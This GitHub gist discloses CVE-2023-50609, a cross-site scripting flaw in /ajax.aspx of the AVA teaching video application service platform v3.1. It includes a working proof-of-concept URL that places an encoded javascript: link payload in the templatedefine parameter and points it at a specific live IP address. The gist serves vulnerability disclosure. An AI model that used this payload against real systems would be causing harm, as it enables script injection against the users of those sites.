Skip to content

Instantly share code, notes, and snippets.

@zhishituboshu
Last active December 21, 2023 07:45
Show Gist options
  • Save zhishituboshu/f8f07e9df411b1ee3d8212a166b2034e to your computer and use it in GitHub Desktop.
Save zhishituboshu/f8f07e9df411b1ee3d8212a166b2034e to your computer and use it in GitHub Desktop.
CVE-2023-50609

CVE_ID:

CVE-2023-50609

BUG_Author:

Ziyun Chai

Affected version:

AVA teaching video application service platform - V3.1

Vendor:

http://www.ava.com.cn/

Vulnerability File:

/ajax.aspx

Description:

Cross Site Scripting vulnerability in AVA teaching video application service platform v.3.1 allows a remote attacker to execute arbitrary code via a crafted script. AVA teaching video application service platform v.3.1 has an XSS vulnerability in /ajax.aspx

Status: Moderate

image

http://124.114.153.218:8081/ajax.aspx?templatedefine=tes%3CA+hReF%3Djavascript:alert(%22hello!!!%22)%3Et%3C%2Fa%3E&null

image

Click image

XSS vulnerability is executed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment